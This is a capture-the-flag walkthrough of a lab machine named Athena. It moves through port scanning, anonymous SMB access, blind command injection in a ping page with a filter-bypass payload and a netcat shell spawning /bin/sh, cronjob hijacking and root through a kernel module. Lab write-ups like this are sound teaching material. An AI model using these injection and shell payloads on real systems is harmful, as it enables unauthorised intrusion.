Athena
Athena
🔍 Nmap Scan
🕵️ First, I ran a full port scan to discover open services:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Nmap scan report for ip-10-80-186-138.eu-west-1.compute.internal (10.80.186.138)
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3b:c8:f8:13:e0:cb:42:60:0d:f6:4c:dc:55:d8:3b:ed (RSA)
| 256 1f:42:e1:c3:a5:17:2a:38:69:3e:9b:73:6d:cd:56:33 (ECDSA)
|_ 256 7a:67:59:8d:37:c5:67:29:e8:53:e8:1e:df:b0:c7:1e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Athena - Gods of olympus
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have SSH, HTTP, and SMB open. Let’s start with the web server: 
Nothing interesting on the main page. Let’s dig deeper: 
💡 Still nothing useful on the web side — let’s move on to SMB.
📂 SMB Enumeration
I connected to the public SMB share anonymously:
1
smbclient //10.80.186.138/public -N
I found a file. Let’s grab it:
1
get msg_for_administrator.txt
Reading the file reveals a path — and interestingly, the intern mentioned is Athena: 
⚡ Command Injection & Blind Shell
🕵️ The path from the note points to a ping utility page. Let’s try to get a reverse shell through it: 
But other payloads are being filtered: 
💡 After some research, I found a way to bypass the filter using command substitution:
1
127.0.0.1 -c1$(sleep 5)
Sending this caused the page to hang for 5+ seconds — confirming blind command injection! The usual reverse shell didn’t work due to the filters, so I tried a blind netcat shell instead:
1
127.0.0.1 -c1$(nc -nlvp 4444 -e /bin/sh)
💻 Let’s stabilize the shell:
1
python3 -c 'import pty;pty.spawn("/bin/bash");'
1
export TERM=xterm
1
^Z // CTRL+Z
1
stty raw -echo; fg
We’re in as www-data. Now we need to move laterally to the athena user to get the flag.
🔐 Lateral Movement — www-data → athena
I uploaded pspy64 to monitor running processes without root:
https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
⚡ A cronjob is running as athena! Let’s look at the script it executes: 
We can write to it — let’s inject a reverse shell: 
After a short wait, the cronjob fires and we get a shell as athena: 
Let’s stabilize this shell too, and grab the user flag: 
🏆 Privilege Escalation — athena → root
We can run:
1
/usr/sbin/insmod /mnt/.../secret/venom.ko
💡 insmod loads a kernel module. I grabbed the venom.ko file to examine it — even though I can’t delete or modify it: 
Let’s examine the kernel module: 
🕵️ It contains a give_root function. I used AI to help craft the exploit, and after loading the module with insmod, it worked: 
🏁 Root flag obtained!









